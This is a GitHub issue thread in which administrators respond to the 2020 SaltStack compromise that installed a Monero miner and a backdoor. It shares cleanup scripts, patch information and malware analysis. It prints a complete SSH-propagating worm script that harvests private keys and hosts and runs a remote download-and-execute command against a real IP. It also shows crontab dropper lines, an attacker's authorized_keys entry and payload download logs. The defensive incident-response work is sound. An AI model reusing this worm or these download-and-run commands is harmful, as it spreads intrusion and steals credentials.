Closed xiaopanggege closed 4 years ago
Everyone, I updated my message. Remove "invite" from the end of the link.
After entering your email. you may have to wait a moment to be accepted by the channel admins (I am not an admin).
New channel is #salt-store-miner-public . No need to DM me for permission anymore!
Cheers!
Found just now in crontab :
wget -q -O - http://54.36.185.99/c.sh | sh > /dev/null 2>&1
Don't forget to check your crontab !
cd /var/spool/cron/crontabs/ && grep . *
Note! The dropper appears to have been updated: hxxp://89.223.121.139/sa.sh
salt-store malware has been modified, the new MD5 hash is: 2c5cbc18d1796fd64f377c43175e79a3
Which is downloaded from: hxxps://bitbucket.org/samk12dd/git/raw/master/salt_storer hxxp://413628.selcdn.ru/cdn/salt-storer
Multiple people at this point have reported this user/repository to Atlassian's Bitbucket. I wish their support would react!
Multiple people at this point have reported this user/repository to Atlassian's Bitbucket. I wish their support would react!
They took it down hours ago, actually.
I cannot stress how important it is, that if you're reading this thread now, you fix it NOW! The malware is improving in real-time. Join the slack channel (links above) for help removing it before it's too late!
Note: once you join, read this thread. It has nearly all the information I've gathered on the situation, and I am continuously updating it:
https://saltstackcommunity.slack.com/archives/C01354HKHMJ/p1588535319018000
If your system runs AppArmor, create two empty profiles, so it won't be able even to execute norally:
salt "*" cmd.run "echo 'profile salt-store /var/tmp/salt-store { }' | tee /etc/apparmor.d/salt-store"
salt "*" cmd.run "apparmor_parser -r -W /etc/apparmor.d/salt-store"
salt "*" cmd.run "echo 'profile salt-minions /tmp/salt-minions { }' | tee /etc/apparmor.d/salt-minions"
salt "*" cmd.run "apparmor_parser -r -W /etc/apparmor.d/salt-minions"
@Talkless Thanks. The script does disable apparmor though, using a shell script run by salt-minion, so I don't think that will help unless you've already patched your salt-master and restarted it. And if you've done that, you'll also need to re-enable apparmor and delete the binaries anyway. Probably still worth doing!
unless you've already patched your salt-master and restarted it.
Well of course.
The awesome part is, the official SaltStack docker repos don't have the fix pushed yet: https://hub.docker.com/r/saltstack/salt/tags
Diff against /etc
backup against current /etc
shows these two new files:
Only in /etc/: ld.so.cache
Only in /etc/selinux: config
what's the patch version for this fix?
what's the patch version for this fix?
There are official packages for 2019.2.x (2019.2.4) and 3000.x (3000.2).
There are also patches available for versions all the way back to 2015.8.10 found here: https://www.saltstack.com/lp/request-patch-april-2020/
Note: once you join, read this thread. It has nearly all the information I've gathered on the situation, and I am continuously updating it:
https://saltstackcommunity.slack.com/archives/C01354HKHMJ/p1588535319018000
Could we have public gist or smth?
I have written this script to clean up most of the damage known to me: https://gist.github.com/itskenny0/df20bdb24a2f49b318a91195634ed3c6
Please note that this might not be complete and that, as Mike in Slack put it, the absence of known fingerprints at this point does not mean that affected hosts are secure.
minions
kill -9 $(pgrep salt-minions) kill -9 $(pgrep salt-store) rm -f /tmp/salt-minions rm -f /var/tmp/salt-store sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf systemctl restart firewalld || /etc/init.d/iptables restart
master
yum update salt-master systemctl restart salt-master
This is working. @aTastyCookie Thank you very much.
I'm also wondering if cleared these back-doors as well as upgraded/patched the master node, is there anything extra we should do?
I'm also wondering if cleared these back-doors as well as upgraded/patched the master node, is there anything extra we should do?
It's worth being very clear about this -- if you had a Salt process running as root, an attacker effectively had root-level access to the system(s) in question. In this thread, there have been descriptions of known attacks but there may also be attacks circulating which do not match the same fingerprints as those so far described.
I emphasize that there is not currently evidence of this at present but at a minimum, anyone affected by this exploit should consider information disclosure, remote back-doors, ransomware and other attack vectors as being possible though, as mentioned -- none of these have yet been seen or reported.
Critical Vulnerability in Salt Requires Immediate Patching https://www.securityweek.com/critical-vulnerability-salt-requires-immediate-patching
You can test if your salt master needs to be patched like so:
curl -X POST -F 'ip=your.saltmaster.ip.address' https://saltexploit.com/test
If it does, it will create /tmp/HACKED.txt
on your master (it will leave your minions alone and doesn't have any other side effects), if not, it won't.
😂 Letting a random site know the IP of your publicly exposed salt-master is a very very bad idea. Don't do that. If you have a public salt master, firewall it off the internet immediately.
If you want to verify whether you need to patch, do it offline with the check script from here: https://github.com/rossengeorgiev/salt-security-backports
Oh yeah I agree completely @rossengeorgiev . Don't trust me at all. Very bad idea. Don't do it. But it works xD
In all seriousness though, I am tying my reputation to not abusing that service, though. So yeah. I'm sure some in the slack channel can attest to that. Take that as you will. I promise I'm not keeping any IP addresses. Pinky swear? I did have 2 strangers in the slack channel audit me, but I can't offer any proof of that either, so...
Site has been updated to point to the offline checker and recommend that over the web one.
@here for anyone who is cleaning up their environment and is worried about potentially compromised salt pub/priv key pairs: https://github.com/dwoz/salt-rekey
We're putting together some information that should be released later today for those that need some help/don't already have a dedicated team.
In case it's not already obvious by this point:
When we get our post live we'll drop it here - in the interim, everyone has been amazing in the #salt-store-miner-public channel on the community Slack :black_heart: :black_heart: :black_heart: :black_heart:
Thanks @waynew. I'm continuing to update my gist and saltexploit.com with all the information I have.
FYI: We had one host sacrficed as honeypot. To see any progress. Seems to be update for the hack.
/tmp/salt-minions
is now keeping up by scripts in /tmp/.ICEd-unix
don't be fooled /tmp/.ICE-unix
is valid directory.
There is also script which at the first glance try to dig more into infrastructure by your own keys
#!/bin/sh
localgo() {
myhostip=$(curl -sL icanhazip.com)
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
pl=$(
echo "22"
cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
)
sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://176.31.60.91/s2.sh|sh; sudo wget -q -O - http://176.31.60.91/s2.sh|sh;"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://176.31.60.91/s2.sh|sh; wget -q -O - http://176.31.60.91/s2.sh|sh;"
done
done
done
done
}
localgo
Hope it helps some one.
After further looking through one of my affected machines, a dropper scriptfile was found. The script tries to find any SSH private keys and copy itself to any SSH hosts it finds in user's history / ssh configs.
Both, the initial script, as well as the downloaded infection script, can be found in an impromptu repo I made: https://github.com/Aldenar/salt-malware-sources/tree/master
DO NOT run any of the scripts. They are live, and will infect your system!
@Aldenar this is a serious development. Where was this file placed?
It also adds a key to /root/.ssh/authorized_keys:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDouxlPJjZxuIhntTaY5MixCXoPdUXwM3IsGd2005bIgazuNL4Y5fxANuahqLia7w28hm9FoBYqkjNQ9JHFEyP0g3gFp94nZzw+mQSJPSeTPKBX0U9B1G4Pi/sTNVDknJjjiQ3sOmJ0AN8JLPC/5ID05h/vMISZ9N/dp36eLV1Z0xSUBC/bddglU3MtdWKI8QLQefQpi5v9tZ2bgBUPA+unsnRA6tn30S/3XS+E9kaE4oMz9P0Yg5aLYc7XMoDVdUSfP8u4LpG1ByLrqAB3cRrU0AndV++e+uBu61boQ5vACHhcqq66b+Vk+9JmvdlT+n+PbNwmJNcFwSLF12fFBoF/
@Foobartender or @frenkye can you tell me what the full path of dropper is?
Hi guys, same issue here, with version 4 of the malware, see https://saltexploit.com/ and compare md5sum of /tmp/salt-minions.
Cleaned up with:
# Script taken from
# https://gist.github.com/itskenny0/df20bdb24a2f49b318a91195634ed3c6#file-cleanup-sh
# Crontab entries deleted, check only
sudo crontab -l | grep 'http://'
# sudo crontab -l | sed '/54.36.185.99/d' | sudo crontab -
# sudo crontab -l | sed '/217.8.117.137/d' | sudo crontab -
#
# Delete and kill malicious processes
sudo kill -9 $(pgrep salt-minions)
sudo kill -9 $(pgrep salt-store)
sudo rm -f /tmp/salt-minions
sudo rm -f /var/tmp/salt-store
sudo kill -9 $(pgrep -f ICEd)
sudo rm -rf /tmp/.ICE*
sudo rm -rf /var/tmp/.ICE*
sudo rm /root/.wget-hsts
# create apparmor profiles to prevent execution
echo 'profile salt-store /var/tmp/salt-store { }' | sudo tee /etc/apparmor.d/salt-store
sudo apparmor_parser -r -W /etc/apparmor.d/salt-store
echo 'profile salt-minions /tmp/salt-minions { }' | sudo tee /etc/apparmor.d/salt-minions
sudo apparmor_parser -r -W /etc/apparmor.d/salt-minions
# reenable nmi watchdog
sudo sysctl kernel.nmi_watchdog=1
sudo echo '1' >/proc/sys/kernel/nmi_watchdog
sudo sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
# disable hugepages
sudo sysctl -w vm.nr_hugepages=0
# enable apparmor
sudo systemctl enable apparmor
sudo systemctl start apparmor
# fix syslog
sudo touch /var/log/syslog
sudo systemctl restart rsyslog
I have uploaded this script on a different web server and then run script similar to this example:
#!/bin/bash
ADDRESS=( 1.2.3.4
5.6.7.8
9.10.11.12
)
function my-ssh() {
ssh -i ~/.ssh/ec2.pem -l ubuntu $*
}
for server in ${ADDRESS[*]}
do
echo $server
my-ssh $server 'wget -q -O - https://myserver/kill_salt.sh | bash -x -v'
done
I found another script fetched from hxxp://176.104.3.35/?<id>
:
1234.txt
@Foobartender is this file, exactly as you fetched it?
@taigrr It was in /tmp/.ICEd-unix/
The script had a completely random name. No suffix to indicate file type.
There are also patches available for versions all the way back to 2015.8.10 found here: https://www.saltstack.com/lp/request-patch-april-2020/
Putting patches behind some sort of sign-up wall requesting personal information isn't exactly classy. Just seems like a way to further annoy users after a major security issue.
@jblac No, I added two obvious lines on top for safety.
I analysed the malware a little, nothing spectacular. The salt-minions binary really seems to be just a Monero miner.
Here is the dropper script from the Cron job: hxxps://pastebin.com/UDykbnpU A few DNS requests were made to pool.minexmr.com. Here is a stack and heap dump of /tmp/salt-minions running in a sandboxed VM with the XMR wallet IDs and IP sockets: hxxps://pastebin.com/wue5zivp And finally here a list of all Go source files: hxxps://pastebin.com/FMu6HfsK
The other one's much nastier. Make sure to clean ALL crontabs in /var/spool/cron, not just the one of the root user.
I analysed the malware a little, nothing spectacular. The salt-minions binary really seems to be just a Monero miner.
Here is the dropper script from the Cron job: hxxps://pastebin.com/UDykbnpU A few DNS requests were made to pool.minexmr.com. Here is a stack and heap dump of /tmp/salt-minions running in a sandboxed VM with the XMR wallet IDs and IP sockets: hxxps://pastebin.com/wue5zivp And finally here a list of all Go source files: hxxps://pastebin.com/FMu6HfsK
The other one's much nastier. Make sure to clean ALL crontabs in /var/spool/cron, not just the one of the root user.
What would be "the other ones"?
Newer versions if you didn't get to it in time.
One's, not ones. I meant the salt-store remote shell. I dumped its memory as well, but nothing interesting popped up, since it doesn't have many hardcoded strings and is probably obfuscated. I could find a sorted array of ASCII characters. I did not perform any more detailed analysis of the disassembly, so the information is of limited value, but I posted it anyway just in case.
@taigrr - please add me to the Slack channel. Thank you for setting it up.
@sdreher It's public, see saltexploit.com
https://github.com/saltstack/salt/issues/57088 For the people still need to use SaltStack, but now temporarily lack confidence.
There is original sa.sh
script: https://file.io/h0dXR3W9 downloaded on our salt instance.
So, i've found some additional files that appear to be dropped.
On the salt-master: /usr/local/lib/liblmvi.so (sha256:2984033766ce913cdf9b7ee92440e7e962b5cb5b90f7d1034f69837f724990ee)
It seems that virustotal doesn't detect it as bad.
It adds this path to /etc/ld.so.preload
On both salt-minions and master i've also found that some of the dropped files can't be deleted due to immutable attribute set.
This string helped, script helped to locate them:
lsattr -aR .//. 2>/dev/null | sed -rn '/i.+\.\/\/\./s/\.\/\///p'
In addition, i've also found /etc/hosts to be edited with additional entries for Bitbucket.
In case somebody would need this. I used this commands to do quick fix on affected systems:
killall -9 salt-store;
rm -f /tmp/salt*;
rm -f /var/tmp/salt*;
rm /usr/bin/salt-store;
kill -9 $(pgrep -f ICEd);
rm -rf /tmp/.ICE*;
rm -rf /var/tmp/.ICE*;
rm /root/.wget-hsts;
sed -i '/bitbucket.org$/d' /etc/hosts;
rm /usr/local/lib/*.so; # as far as I know there should not be any legitimate .so but check it before running
rm /etc/ld.so.preload;
ldconfig;
sed -i '/kernel.nmi_watchdog=0$/d' /etc/sysctl.conf;
rm /etc/selinux/config; #if you do not use custom selinux config
touch /var/log/syslog;
service rsyslog restart;
rm /etc/salt/minion.d/_schedule.conf;
systemctl stop salt-minion;
rm /etc/salt/pki/minion/*; #need to regenerate salt keys
rm /var/tmp/rf /var/tmp/temp3754r97y12
I never seem this mentioned before, but I found this file trying to periodicaly run salt:
rm /etc/salt/minion.d/_schedule.conf;
Also check /etc/cron.d
for strange files usually with random 4-5 letter name.
@MartinMystikJonas : please don't try to salvage systems at this point. Start fresh.
/etc/salt/minion.d/_schedule.conf
: this file is fine. Please read the documentation if you're confused on what it is.
Everyone else: that helper script may be enough to help you calm down your CPU cycles enough to pull out data from your boxes (make the Cryptominer calm down for a bit) but please remember all your ssh keys and secrets were probably stolen, and you have no way to know what's lingering.
If you have any other questions, please visit saltexploit.com or visit the slack channel (directions also on saltexploit.com)
Hi @wavded,
Can you please share the logs path location as what you mention below? Appreciate it. Thanks.
Regards, SC
In our experience, we had one job that was executed that did the following on each server according to the logs:
<83>¦returnÚláFirewall stopped and disabled on system startup kernel.nmi_watchdog = 0 userdel: user 'akay' does not exist userdel: user 'vfinder' does not exist chattr: No such file or directory while trying to stat /root/.ssh/authorized_keys grep: Trailing backslash grep: write error: Broken pipe log_rot: no process found chattr: No such file or directory while trying to stat /etc/ld.so.preload rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory rm: cannot remove '/var/tmp/lib': No such file or directory rm: cannot remove '/var/tmp/.lib': No such file or directory chattr: No such file or directory while trying to stat /tmp/lok chmod: cannot access '/tmp/lok': No such file or directory sh: 484: docker: not found sh: 485: docker: not found sh: 486: docker: not found sh: 487: docker: not found sh: 488: docker: not found sh: 489: docker: not found sh: 490: docker: not found sh: 491: docker: not found sh: 492: docker: not found sh: 493: docker: not found sh: 494: docker: not found sh: 495: docker: not found sh: 496: docker: not found sh: 497: docker: not found sh: 498: docker: not found sh: 499: docker: not found sh: 500: docker: not found sh: 501: docker: not found sh: 502: docker: not found sh: 503: docker: not found sh: 504: docker: not found sh: 505: docker: not found sh: 506: setenforce: not found apparmor.service is not a native service, redirecting to systemd-sysv-install Executing /lib/systemd/systemd-sysv-install disable apparmor insserv: warning: current start runlevel(s) (empty) of script `apparmor' overrides LSB defaults (S). insserv: warning: current stop runlevel(s) (S) of script `apparmor' overrides LSB defaults (empty). Failed to stop aliyun.service.service: Unit aliyun.service.service not loaded. Failed to execute operation: No such file or directory P NOT EXISTS md5sum: /var/tmp/salt-store: No such file or directory salt-store wrong --2020-05-02 20:10:27-- https://bitbucket.org/samk12dd/git/raw/master/salt-store Resolving bitbucket.org (bitbucket.org)... 18.205.93.1, 18.205.93.2, 18.205.93.0, ... Connecting to bitbucket.org (bitbucket.org)|18.205.93.1|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 16687104 (16M) [application/octet-stream] Saving to: '/var/tmp/salt-store' 2020-05-02 20:10:40 (1.27 MB/s) - '/var/tmp/salt-store' saved [16687104/16687104] 8ec3385e20d6d9a88bc95831783beaeb salt-store OK§retcode^@§successÃ
@suhaimi-cyber4n6 it's on the salt-master. Look in the cachedir
for saltstack. (Usually /var/cache/salt/master/jobs
) Note that by default, salt only stores your jobs for 24 hours, so it may be too late to see your output by now.
Thank you very much @taigrr . I really appreciate it. :)
@suhaimi-cyber4n6 it's on the salt-master. Look in the
cachedir
for saltstack. (Usually/var/cache/salt/master/jobs
) Note that by default, salt only stores your jobs for 24 hours, so it may be too late to see your output by now.
Description My all servers with salt-minion installed,An unknown program suddenly ran today, He's /tmp/salt-minions
[root@yunwei ~]# top
top - 10:06:44 up 511 days, 18:39, 3 users, load average: 2.01, 2.02, 1.91 Tasks: 193 total, 1 running, 192 sleeping, 0 stopped, 0 zombie Cpu(s): 7.2%us, 18.3%sy, 0.0%ni, 74.1%id, 0.4%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 8060948k total, 7502768k used, 558180k free, 76316k buffers Swap: 4194300k total, 437368k used, 3756932k free, 188012k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2280 root 20 0 56.0g 541m 1588 S 101.1 6.9 345886:48 tp_core
27061 root 20 0 2797m 1848 1000 S 99.1 0.0 36:02.75 salt-minions
[root@yunwei ~]# ps -ef |grep 27061 | grep -v grep root 27061 1 89 09:26 ? 00:36:37 /tmp/salt-minions
sal-minion version 2018.3.2 sys:CentOS release 6.5 (Final)